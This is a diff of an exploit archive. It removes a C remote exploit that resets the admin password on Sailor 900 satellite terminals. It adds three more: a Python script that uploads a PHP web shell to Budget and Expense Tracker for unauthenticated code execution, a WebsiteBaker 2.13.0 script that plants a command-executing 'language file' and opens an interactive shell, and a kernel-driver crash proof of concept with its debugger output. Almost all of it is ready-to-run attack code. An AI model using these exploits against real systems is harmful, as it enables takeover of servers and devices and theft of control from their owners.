diff --git a/exploits/hardware/remote/35932.c b/exploits/hardware/remote/35932.c
deleted file mode 100644
index 1974f3feb..000000000
--- a/exploits/hardware/remote/35932.c
+++ /dev/null
@@ -1,254 +0,0 @@
-/*
-  ** File : satcompwn.c - [VSAT SAILOR SAT COM 900 Remote 0day]
-  ** Author : Nicholas Lemonias
-  **
-  ** This is proprietary source code material of Advanced Information Security Corporation.
-  ** Usage, distribution and modifications are pursuant to our terms of agreement.
-  **
-  **
-  ** Copyright (c) 2009-2014, Advanced Information Security Corporation as represented by the
-  ** author of this software.
-  ** All rights reserved.
-  **
-  **
-  ** This research demo is for academic research purposes ONLY. You may only use this software for
-  ** educational purposes, or for the purpose of academic research.
-  ** This work is copyright protected. You may not, copy, or distribute
-  ** or use this in any other way, without prior authorisation. This work is covered by DMCA and
-  ** other applicable intellectual property laws.
-  **
-  **   #@#@~  VSAT SAILOR 900 / SATCOM  (iDirect/Linux)
-  **
-  **   Poc Tested on our: iDirect Infiniti VMU/SATCOM v.1.47 Build 9
-  **   Platform Frequency: Ku/Ka band
-  **   Compatible Networks: Jabiru, Inmarsat GX, and Intelsat's Epic
-  **
-  */
-
-  /****************************************************************************************
-   (c) 2014 Advanced Information Security Corporation
-  *****************************************************************************************/
-
-
-   /*
-   ** Compilation: cc satcompwn.c -o satcompwn
-   ** HOW-TO:
-   **
-   ** Usage: ./satcompwn <host> <port>\n
-   **
-   **
-    */
-
-
-#include <netinet/in.h>
-#include <signal.h>
-#include <stdlib.h>
-#include <stdio.h>
-#include <string.h>
-#include <sys/types.h>
-#include <sys/socket.h>
-#include <sys/wait.h>
-#include <netdb.h>
-#include <unistd.h>
-#include <arpa/inet.h>
-#include <assert.h>
-#include <errno.h>
-#include <time.h>
-#include <fcntl.h>
-#include <sys/time.h>
-#include <sys/socket.h>
-
-#define BUFFER_MAX_SIZE 65535
-#define BUFFER_MIN_LEN  230
-
-ssize_t payload(int sock, char *hst, char *pg, char *pss)
-{
-    char BUF_SIZE_S[BUFFER_MAX_SIZE + 1], BUF_SIZE_R[BUFFER_MAX_SIZE + 1];
-    ssize_t n; char *l;
-
-    snprintf(BUF_SIZE_S, BUFFER_MIN_LEN,
-             "POST %s HTTP/1.0\n\n"
-             "Host: %s\r\n"
-             "Content-type: application/x-www-form-urlencoded\r\n"
-             "Content-length: %zu \r\n"
-             "Cookie: tt_adm=694020\r\n"
-             "%s \r\n\n", pg, hst, strlen(pss), pss);
-
-   if(write(sock,BUF_SIZE_S, strlen(BUF_SIZE_S)) == -1) {
-            error("Read error");
-            return -1;
-}
-    printf("\n");
-    printf("Sending Payload.....\n");
-
-    printf("\n\n");
-    printf("%s", BUF_SIZE_S, sizeof(BUF_SIZE_S));
-
-
-  while ((n =read(sock,BUF_SIZE_R,sizeof(BUF_SIZE_R))) > 0){
-        BUF_SIZE_R[n] = '\0';
-
-         if(n == -1) {
-            error("Read error");
-            return -1;
-}
-
-
-
-   if ( strstr(BUF_SIZE_R, "404")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.4.5 - False Positive HTTP ERROR [404] Host is not a V-SAT Sailor 900 terminal.\n\n\n");
-   if ( strstr(BUF_SIZE_R, "401")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.4.2 - HTTP Unauthorized [401] Unauthorized Access to remote host.\n\n\n");
-   if ( strstr(BUF_SIZE_R, "500")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.5.1 - HTTP Internal Server Error [500] Internal Server Error - The remote host couldn't recognise the request. This is not a valid SAILOR 900 terminal.\n\n\n");
-   if ( strstr(BUF_SIZE_R, "303")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.3.4 - HTTP See Other [303] Possible Redirect - The code received says it is temporary under a different URL. This is not a valid SAILOR 900 terminal.\n\n\n");
-   if ( strstr(BUF_SIZE_R, "307")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.3.8 - HTTP Temporary Redirect [307] Possible Redirect - The requested resource received indicates redirection. This is not a valid SAILOR 900 terminal.\n\n\n");
-   if ( strstr(BUF_SIZE_R, "403")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.4.4 - HTTP Forbidden [403] The remote server/ understood the request, but is refusing to fulfill it.\n\n\n");
-   if ( strstr(BUF_SIZE_R, "407")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.4.8 - HTTP Proxy Authentication Required [407] - The remote terminal requires HTTP authentication. If this is a valid SAILOR 900 terminal, it is protected with HTTP authentication.\n\n\n");
-   if ( strstr(BUF_SIZE_R, "408")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.4.9 - HTTP Request Time out [408] - The client did not produce a request within the time that the server was prepared to wait.\n\n\n");
-   if ( strstr(BUF_SIZE_R, "503")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.5.4 - HTTP Service Unavailable [503] - Connection Refused. The hostname of the terminal provided is currently unable to handle the request.\n\n\n");
-   if ( strstr(BUF_SIZE_R, "411")) printf("\n\n[x] Exploit Failed Ref. RFC 2616 - Error 411 - Length Required. This is not a valid SAILOR 900 terminal.\n\n\n");
-   if ( strstr(BUF_SIZE_R, "400")) printf("\n\n[x] Exploit Failed Ref. RFC 2616 - Error 400 - Bad Request. This is not a valid SAILOR 900 terminal. The request could not be understood by the remote server.\n\n\n");
-   if ( strstr(BUF_SIZE_R, "301")) printf("\n\n[x] Exploit Failed Ref. RFC 2616 - Error 301 - Moved Permanently. This is not a valid SAILOR 900 terminal. The request could not be understood by the remote server.\n\n\n");
-   if ( strstr(BUF_SIZE_R, "BAD REQUEST")) printf("\n\n[x] Exploit Failed. This is not a valid SAILOR 900 terminal.\n\n\n");
-
-   if ( strstr(BUF_SIZE_R, "202")) {
-
-  while ( (l=strstr(BUF_SIZE_R,"Thrane & Thrane")) == NULL ) printf("\n\n[x] Exploit Failed. This is not a valid SAILOR 900 terminal...\n\n\n"); }
-
-  else if (strstr(BUF_SIZE_R, "Thrane & Thrane") != NULL && strstr(BUF_SIZE_R, "302") == NULL){
-   printf("[x] Mission Successful  Ref. RFC 2616, 10.2.3 - HTTP Okay  [202] The remote host is a V-SAT Sailor 900. Please Login as administrator: user:admin & pass:aisatpwn2134 on %s\n\n\n", hst);
-  }
-}
- printf("***********************************************************************\n");
- printf("*Advanced Information Security Corporation, 2014 - All Rights Reserved*\n");
- printf("***********************************************************************\n");
- printf("* Please wait.. I will provide you with some more information below:\n");
- printf("***********************************************************************\n");
- printf("\n\n\n\n");
- printf("%s \n\n", BUF_SIZE_R, sizeof(BUF_SIZE_R));
-
-  return n;
-
-}
-
-int main (int argc, char *argv[]) {
-
-
-   char *pg  = "/index.lua?pageID=administration";
-   char *pss = "&usernameAdmChange=admin"
-               "&passwordAdmChange=aisatpwn2134";
-
-   // char *cval = "tt_adm=tt_adm=694020";
-
-   long arg;
-   int sock, opt, evalopt, s;
-
-
-if(argc < 2)
-{
-      printf("***********************************************************************\n");
-      printf("(Advanced Information Security Corporation, 2014 - All Rights Reserved*\n");
-      printf("***********************************************************************\n");
-      printf("*                                                                     *\n");
-      printf("*                (V-SAT SAILOR 900 Remote Exploit)                    *\n");
-      printf("***********************************************************************\n");
-      printf("* Disclaimer: This is proprietary source code material of Advanced    *\n");
-      printf("* Information Security Corporation. This software is for              *\n");
-      printf("* research purposes only.                                             *\n");
-      printf("***********************************************************************\n");
-      printf("*    VSAT Sailor 900 / Tested on iDirect Infiniti VMU v.1.47 Build 9  *\n");
-      printf("* Description:                                                        *\n");
-      printf("* The Sailor 900 VSAT is an advanced maritime stabilised Ku/Ka band   *\n");
-      printf("* platform with integrated GPS, compatible with a number of satellite *\n");
-      printf("* networks, such as Jabiru, Inmarsat GX, and Intelsat's Epic.         *\n");
-      printf("***********************************************************************\n");
-      printf("\n\n");
-      fprintf(stderr, " Main Menu \n");
-      fprintf(stderr, " Usage: %s <host> <port>\n", argv[0]);
-      exit(1);
-}
-   struct timeval tv;
-   struct sockaddr_in remote;
-   struct hostent *host;
-   socklen_t lon;
-
-
-   host = gethostbyname((void *)argv[1]);
-
-   fd_set wset;
-   fd_set rset;
-
-  sock = socket(AF_INET,SOCK_STREAM,0);
-  remote.sin_port = htons(atoi(argv[2]));
-  remote.sin_addr.s_addr =  htonl(INADDR_ANY);
-  remote.sin_addr.s_addr = ((struct in_addr *)(host->h_addr))->s_addr;
-  remote.sin_family = AF_INET;
-  memset(remote.sin_zero,0,sizeof(remote.sin_zero));
-  fflush(stdout);
-
-
-  if (sock == -1) {
-    perror("socket creation error");
-   return -1;
-  }
-  FD_ZERO( &wset );
-  FD_SET( sock , &wset );
-
-  FD_ZERO( &rset );
-  FD_SET( sock , &rset );
-
-  tv.tv_sec  = 3;
-  tv.tv_usec = 0;
-
-
- s = connect(sock,(struct sockaddr *)&remote,sizeof(struct sockaddr));
- if (s == -1 ) {
-    perror("connection ");
-   return -1;}
-
-  if( errno != 0) {
-    perror("connection ");
-   return -1;
-  }
-
-   arg = fcntl(sock, F_GETFL, NULL);
-   arg |= O_NONBLOCK;
-   fcntl(sock, F_SETFL, arg);
-  if( fcntl( sock , F_SETFL , O_NONBLOCK ) == -1 ) {
-    perror("fcntl error");
-   return -1;
-  }
-
-  opt = select(sock+1,NULL,&wset,NULL,&tv);
-
-  if( opt == -1 ) {
-    perror("select");
-   return -1;
-  }
-  if (opt > 0) {
-  lon = sizeof(int);
-  getsockopt(sock, SOL_SOCKET, SO_ERROR, (void*)(&evalopt), &lon);
-
- if (evalopt) {
-              fprintf(stderr, "Socket Connection Error Code at: %d - %s\n", evalopt, strerror(evalopt));
-              exit(0);
-           }
-
-
-if( fcntl( sock , F_SETFL , 0 ) == -1 ) {
-    perror("fcntl");
-    printf("[RST-FCNTL] FCNTL Error. Exiting the software.\n\n");
-   return -1;
-}
-
-
-if( payload(sock,host->h_name,pg,pss) != 1) printf("\n\n[x] Payload Sent. Please check server responses above to verify status.\n\n");
-
-
-  arg = fcntl(sock, F_GETFL, NULL);
-  arg &= (~O_NONBLOCK);
-  fcntl(sock, F_SETFL, arg);
-
-        close(sock);
-        exit(1);
- }
-
-}
\ No newline at end of file
diff --git a/exploits/php/webapps/50308.txt b/exploits/php/webapps/50308.txt
new file mode 100644
index 000000000..7b235bf01
--- /dev/null
+++ b/exploits/php/webapps/50308.txt
@@ -0,0 +1,129 @@
+# Exploit Title: Budget and Expense Tracker System 1.0 -  Remote Code Execution (RCE) (Unauthenticated)
+# Exploit Author: Abdullah Khawaja (hax.3xploit)
+# Date: 2021-09-21
+# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip
+# Version: 2.0
+# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4
+# Description: Budget and Expense Tracker System 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters.
+
+
+
+# RCE via executing exploit:
+    # Step 1: run the exploit in python with this command: python3 BMAETS_v1.0.py
+    # Step 2: Input the URL of the vulnerable application: Example: http://localhost/expense_budget/
+
+
+import requests, sys, urllib, re
+import datetime
+from colorama import Fore, Back, Style
+
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+
+
+
+
+header = Style.BRIGHT+Fore.RED+'              '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL
+
+print(Style.BRIGHT+"               Budget and Expense Tracker System 1.0")
+print(Style.BRIGHT+"            Unauthenticated Remote Code Execution"+Style.RESET_ALL)
+print(header)
+
+print(r"""
+        ______ _______                         ________
+        ___  //_/__  /_______ ___      _______ ______(_)_____ _
+        __  ,<  __  __ \  __ `/_ | /| / /  __ `/____  /_  __ `/
+        _  /| | _  / / / /_/ /__ |/ |/ // /_/ /____  / / /_/ /
+        /_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___  /  \__,_/
+                                               /___/
+                    abdullahkhawaja.com
+            """)
+
+
+
+GREEN =  '\033[32m' # Green Text
+RED =  '\033[31m' # Red Text
+RESET = '\033[m' # reset to the defaults
+
+proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}
+
+
+#Create a new session
+s = requests.Session()
+
+
+#Set Cookie
+cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}
+
+LINK=input("Enter URL of The Vulnarable Application : ")
+
+
+def webshell(LINK, session):
+    try:
+        WEB_SHELL = LINK+'/uploads/'+filename
+        getdir  = {'cmd': 'echo %CD%'}
+        r2 = session.get(WEB_SHELL, params=getdir, verify=False, proxies=proxies)
+        status = r2.status_code
+        if status != 200:
+            print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL)
+            r2.raise_for_status()
+        print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
+        cwd = re.findall('[CDEF].*', r2.text)
+        cwd = cwd[0]+"> "
+        term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
+        while True:
+            thought = input(term)
+            command = {'cmd': thought}
+            r2 = requests.get(WEB_SHELL, params=command, verify=False)
+            status = r2.status_code
+            if status != 200:
+                r2.raise_for_status()
+            response2 = r2.text
+            print(response2)
+    except:
+        print("\r\nExiting.")
+        sys.exit(-1)
+
+
+#Creating a PHP Web Shell
+
+phpshell  = {
+               'img':
+                  (
+                   'shell.php',
+                   '<?php echo shell_exec($_REQUEST["cmd"]); ?>',
+                   'application/octet-stream',
+                  {'Content-Disposition': 'form-data'}
+                  )
+             }
+
+# Defining value for form data
+data = {'name':'Budget and Expense Tracker System - PHP', 'short_name':'B&E Tracker'}
+
+
+def id_generator():
+    x = datetime.datetime.now()
+    date_string = x.strftime("%y-%m-%d %H:%M")
+    date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M")
+    timestamp = datetime.datetime.timestamp(date)
+    file = int(timestamp)
+    final_name = str(file)+'_shell.php'
+    return final_name
+
+filename = id_generator()
+#Uploading Reverse Shell
+print("[*]Uploading PHP Shell For RCE...")
+upload = s.post(LINK+'classes/SystemSettings.php?f=update_settings', cookies=cookies, files=phpshell, data=data,  proxies=proxies)
+
+shell_upload = True if("1" in upload.text) else False
+u=shell_upload
+if u:
+	print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET)
+else:
+	print(RED+"[-]Failed To Upload The PHP Shell!", RESET)
+
+
+
+#Executing The Webshell
+webshell(LINK, s)
\ No newline at end of file
diff --git a/exploits/php/webapps/50310.py b/exploits/php/webapps/50310.py
new file mode 100755
index 000000000..cf5455acc
--- /dev/null
+++ b/exploits/php/webapps/50310.py
@@ -0,0 +1,290 @@
+# Exploit Title: WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)
+# Date: 18-09-2021
+# Exploit Author: Halit AKAYDIN (hLtAkydn)
+# Vendor Homepage: https://websitebaker.org/
+# Software Link: http://wiki.websitebaker.org/doku.php/en/downloads
+# Version: 2.13.0
+# Category: Webapps
+# Tested on: Linux/Windows
+
+# WebsiteBaker Open Source Content Management
+# Includes an endpoint that allows remote access
+# Language page misconfigured, causing vulnerability
+# User information with sufficient permissions is required.
+# I had to write a long script to bypass some security measures.
+
+# Example: python3 exploit.py -u http://example.com -l admin -p Admin123
+#		   python3 exploit.py -h
+
+
+from bs4 import BeautifulSoup
+from time import sleep
+import requests
+import argparse
+
+
+def main():
+	parser = argparse.ArgumentParser(
+		description='WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)'
+	)
+	parser.add_argument('-u', '--host', type=str, required=True)
+	parser.add_argument('-l', '--login', type=str, required=True)
+	parser.add_argument('-p', '--password', type=str, required=True)
+	args = parser.parse_args()
+	print("\nWebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)",
+		  "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
+	sleep(2)
+	find_default(args)
+
+
+
+def find_default(args):
+	#Check http or https
+	if args.host.startswith(('http://', 'https://')):
+		print("[?] Check Url...\n")
+		args.host = args.host
+		if args.host.endswith('/'):
+			args.host = args.host[:-1]
+		sleep(2)
+	else:
+		print("\n[?] Check Adress...\n")
+		args.host = "http://" + args.host
+		args.host = args.host
+		if args.host.endswith('/'):
+			args.host = args.host[:-1]
+		sleep(2)
+
+
+	# Check Host Status
+	try:
+		response = requests.get(args.host)
+		if response.status_code != 200:
+			print("[-] Address not reachable!\n")
+			sleep(2)
+			exit(1)
+
+	except requests.ConnectionError as exception:
+		print("[-] Address not reachable!\n")
+		sleep(2)
+		exit(1)
+
+	exploit(args)
+
+	url = args.host + "/admin/login/index.php"
+	headers = {
+		"Upgrade-Insecure-Requests": "1",
+		"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
+		"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
+		"Referer": args.host + "/admin/addons/index.php",
+		"Accept-Encoding": "gzip, deflate",
+		"Accept-Language": "en-US,en;q=0.9",
+		"Connection": "close"
+	}
+	response = requests.get(url, headers=headers)
+	for cookie in response.cookies:
+		phpsessid_name = cookie.name
+
+	soup = BeautifulSoup(response.text, 'html.parser')
+	input_hidden_username = (soup.find_all("input", type="hidden")[1].get("value"))
+	input_hidden_password = (soup.find_all("input", type="hidden")[2].get("value"))
+	input_hidden_name = (soup.find_all("input", type="hidden")[3].get("name"))
+	input_hidden_value = (soup.find_all("input", type="hidden")[3].get("value"))
+
+
+	login(args, phpsessid_name, input_hidden_username, input_hidden_password, input_hidden_name, input_hidden_value)
+
+
+
+def login(args, phpsessid_name, input_hidden_username, input_hidden_password, input_hidden_name, input_hidden_value):
+
+	session = requests.session()
+
+	url = args.host + "/admin/login/index.php"
+	cookies = {
+		"klaro": "{'klaro':true,'mathCaptcha':true}"
+	}
+
+	headers = {
+		"Cache-Control": "max-age=0",
+		"Upgrade-Insecure-Requests": "1",
+		"Origin": args.host,
+		"Content-Type": "application/x-www-form-urlencoded",
+		"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
+		"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
+		"Referer": args.host + "/admin/login/index.php",
+		"Accept-Encoding": "gzip, deflate",
+		"Accept-Language": "en-US,en;q=0.9", "Connection": "close"
+	}
+
+	data = {
+		"url": '',
+		"username_fieldname": input_hidden_username,
+		"password_fieldname": input_hidden_password,
+		input_hidden_name: input_hidden_value,
+		input_hidden_username : args.login,
+		input_hidden_password : args.password,
+		"submit": ''
+	}
+
+
+	response = session.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False)
+	new_cookie = (response.cookies.get(phpsessid_name))
+
+	if response.headers.get("Location") == args.host + "/admin/start/index.php":
+		print("[+] Success Login...\n")
+		sleep(2)
+		check_pers(args, phpsessid_name, new_cookie)
+	else:
+		print("[-] Login Failed...\n")
+		print("Your username or password is incorrect.")
+		sleep(2)
+
+
+def check_pers(args, phpsessid_name, new_cookie):
+	url = args.host + "/admin/languages/install.php"
+	cookies = {
+		"klaro": "{'klaro':true,'mathCaptcha':true}",
+		phpsessid_name : new_cookie
+	}
+	headers = {
+		"Cache-Control": "max-age=0",
+		"Upgrade-Insecure-Requests": "1",
+		"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
+		"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
+		"Accept-Encoding": "gzip, deflate",
+		"Accept-Language": "en-US,en;q=0.9",
+		"Connection": "close"
+	}
+	response = requests.get(url, headers=headers, cookies=cookies)
+	soup = BeautifulSoup(response.text, 'html.parser')
+
+	if (soup.find_all("title")[0].text == "Enter your website title » Administration - Add-ons"):
+		find_token(args, phpsessid_name, new_cookie)
+	else:
+		print("[!] Unauthorized user!\n\n")
+		print("Requires user with language editing permissions.")
+		sleep(2)
+		exit(1)
+
+
+def find_token(args, phpsessid_name, new_cookie):
+	url = args.host + "/admin/languages/index.php"
+	cookies = {
+		"klaro": "{'klaro':true,'mathCaptcha':true}",
+		phpsessid_name : new_cookie
+	}
+	headers = {
+		"Cache-Control": "max-age=0",
+		"Upgrade-Insecure-Requests": "1",
+		"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
+		"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
+		"Accept-Encoding": "gzip, deflate",
+		"Accept-Language": "en-US,en;q=0.9",
+		"Connection": "close"
+	}
+	response = requests.get(url, headers=headers, cookies=cookies)
+	soup = BeautifulSoup(response.text, 'html.parser')
+	token_hidden_name = soup.find_all("input", type="hidden")[5].get("name")
+	token_hidden_value = soup.find_all("input", type="hidden")[5].get("value")
+
+
+	if soup.find_all("option")[1].text == "":
+		exploit(args)
+	elif soup.find_all("option")[20].text == "Türkçe":
+		token_lang = soup.find_all("option")[20].get("value")
+		uninstall_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value, token_lang)
+	else:
+		install_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value)
+		pass
+
+
+def install_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value):
+	url = args.host + "/admin/languages/install.php"
+	cookies = {
+		"klaro": "{'klaro':true,'mathCaptcha':true}",
+		 phpsessid_name: new_cookie
+	}
+
+	headers = {
+		"Cache-Control": "max-age=0",
+		"Upgrade-Insecure-Requests": "1",
+		"Origin": args.host,
+		"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryCyjXuM2KSAsqjze1",
+		"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
+		"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
+		"Referer": args.host + "/admin/languages/index.php",
+		"Accept-Encoding": "gzip, deflate",
+		"Accept-Language": "en-US,en;q=0.9",
+		"Connection": "close"
+	}
+
+	data = "------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\ninstall\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"advanced\"\r\n\r\n\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\""+token_hidden_name+"\"\r\n\r\n"+token_hidden_value+"\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"TR.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php system($_GET['cmd']); ?>\n\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nInstall\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"overwrite\"\r\n\r\ntrue\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1--\r\n"
+	response = requests.post(url, headers=headers, cookies=cookies, data=data)
+	soup = BeautifulSoup(response.text, 'html.parser')
+	# print(soup.find_all("div", class_="w3-text-grey w3--medium"))
+	print("[!] Installing Vuln Lang File!\n")
+	sleep(2)
+	find_token(args, phpsessid_name, new_cookie)
+
+
+
+def uninstall_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value, token_lang):
+
+	url = args.host + "/admin/languages/uninstall.php"
+	cookies = {
+		"klaro": "{'klaro':true,'mathCaptcha':true}",
+		phpsessid_name: new_cookie
+	}
+	headers = {
+		"Cache-Control": "max-age=0",
+		"Upgrade-Insecure-Requests": "1",
+		"Origin": args.host,
+		"Content-Type": "application/x-www-form-urlencoded",
+		"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
+		"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
+		"Referer": args.host + "/admin/languages/index.php",
+		"Accept-Encoding": "gzip, deflate",
+		"Accept-Language": "en-US,en;q=0.9",
+		"Connection": "close"
+	}
+	data = {
+		"action": "uninstall",
+		"advanced": '',
+		token_hidden_name : token_hidden_value,
+		"file": token_lang,
+		"submit": "Uninstall"
+	}
+	response = requests.post(url, headers=headers, cookies=cookies, data=data)
+	soup = BeautifulSoup(response.text, 'html.parser')
+	print("[!] Uninstall Lang File!\n")
+	# print(soup.find_all("div", class_="w3-text-grey w3--medium"))
+	sleep(2)
+	find_token(args, phpsessid_name, new_cookie)
+
+
+
+def exploit(args):
+	response = requests.get(args.host + "/languages/TR.php?cmd=whoami")
+	if response.status_code == 200:
+		print("[*] Exploit File Exists!\n")
+		sleep(2)
+		print("[+] Exploit Done!\n")
+		sleep(2)
+
+		while True:
+			cmd = input("$ ")
+			url = args.host + "/languages/TR.php?cmd=" + cmd
+			headers = {
+				"Upgrade-Insecure-Requests": "1",
+				"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
+			}
+
+			response = requests.post(url, headers=headers, timeout=5)
+
+			if response.text == "":
+				print(cmd + ": command not found\n")
+			else:
+				print(response.text)
+
+if __name__ == '__main__':
+	main()
\ No newline at end of file
diff --git a/exploits/windows/dos/50311.py b/exploits/windows/dos/50311.py
new file mode 100755
index 000000000..eea39e2a2
--- /dev/null
+++ b/exploits/windows/dos/50311.py
@@ -0,0 +1,300 @@
+# Exploit Title: Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial-Of-Service (PoC)
+# Date: 2021/04/07
+# Exploit Author: Quadron Research Lab
+# Version: all version
+# Tested on: Windows 10 x64 HUN/ENG Professional
+# Vendor: https://www.yenkee.eu/gaming-mouse-hornet-aim/yms-3029
+# Reference: https://github.com/Quadron-Research-Lab/Kernel_Driver_bugs/tree/main/GM312Fltr
+
+import ctypes, sys
+from ctypes import *
+import io
+from itertools import product
+from sys import argv
+
+devicename = "GM312Fltr"
+
+ioctl = 0x22245C
+
+ioctl_list = '''
+0x22245C
+0x222440
+0x222441
+0x222400
+0x222404
+0x222408
+0x222420
+0x222424
+0x222448
+0x222450
+0x22245c
+0x222460
+'''
+
+kernel32 = windll.kernel32
+hevDevice = kernel32.CreateFileA("\\\\.\\GM312Fltr", 0xC0000000, 0, None, 0x3, 0, None)
+
+if not hevDevice or hevDevice == -1:
+    print ("Not Win! Sorry!")
+
+else:
+    print ("OPENED!")
+
+    buf = 'A' * 2000
+    bufLength = 2000
+
+    kernel32.DeviceIoControl(hevDevice, ioctl, buf, bufLength, None, 0, byref(c_ulong()), None)
+
+[Bugcheck Analysis]
+Fatal System Error 0x000000f7
+                       (0xBEBEA1CAEAF0A2C1,0x0000F80736BC1742,0xFFFF07F8C943E8BD,0x0000000000000000)
+
+Break instruction exception - code 80000003 (first chance)
+nt!DbgBreakPointWithStatus
+fffff807`2e1feb90 cc                      int     3
+0 kd !analyze
+Connected to Windows 10 19041 x64 target at (Mon Jun 14 204816.370 2021 (UTC + 200)), ptr64 TRUE
+Loading Kernel Symbols
+...............................................................
+................................................................
+........................
+
+Press ctrl-c (cdb, kd, ntsd) or ctrl-break (windbg) to abort symbol loads that take too long.
+Run !sym noisy before .reload to track down problems loading symbols.
+
+........................................
+.............................
+Loading User Symbols
+.............................................
+Loading unloaded module list
+........
+
+
+                        Bugcheck Analysis
+
+
+
+DRIVER_OVERRAN_STACK_BUFFER (f7)
+A driver has overrun a stack-based buffer.  This overrun could potentially
+allow a malicious user to gain control of this machine.
+DESCRIPTION
+A driver overran a stack-based buffer (or local variable) in a way that would
+have overwritten the function's return address and jumped back to an arbitrary
+address when the function returned.  This is the classic buffer overrun
+hacking attack and the system has been brought down to prevent a malicious user
+from gaining complete control of it.
+Do a kb to get a stack backtrace -- the last routine on the stack before the
+buffer overrun handlers and bugcheck call is the one that overran its local
+variable(s).
+Arguments
+Arg1 bebea1caeaf0a2c1, Actual security check cookie from the stack
+Arg2 0000f80736bc1742, Expected security check cookie
+Arg3 ffff07f8c943e8bd, Complement of the expected security check cookie
+Arg4 0000000000000000, zero
+
+Debugging Details
+------------------
+
+
+BUGCHECK_CODE  f7
+
+BUGCHECK_P1 bebea1caeaf0a2c1
+
+BUGCHECK_P2 f80736bc1742
+
+BUGCHECK_P3 ffff07f8c943e8bd
+
+BUGCHECK_P4 0
+
+PROCESS_NAME  pythonw.exe
+
+SYMBOL_NAME  GM312Fltr+e1e
+
+MODULE_NAME GM312Fltr
+
+IMAGE_NAME  GM312Fltr.sys
+
+FAILURE_BUCKET_ID  0xF7_MISSING_GSFRAME_STACKPTR_ERROR_GM312Fltr!unknown_function
+
+FAILURE_ID_HASH  {b8e05604-2a11-789a-ad29-fc4916710f2d}
+
+Followup     MachineOwner
+---------
+
+0 kd kb
+RetAddr            Args to Child                                                            Call Site
+fffff807`2e312d12  fffff807`344a4ae0 fffff807`2e17d000 00000000`00000000 00000000`00000000  nt!DbgBreakPointWithStatus
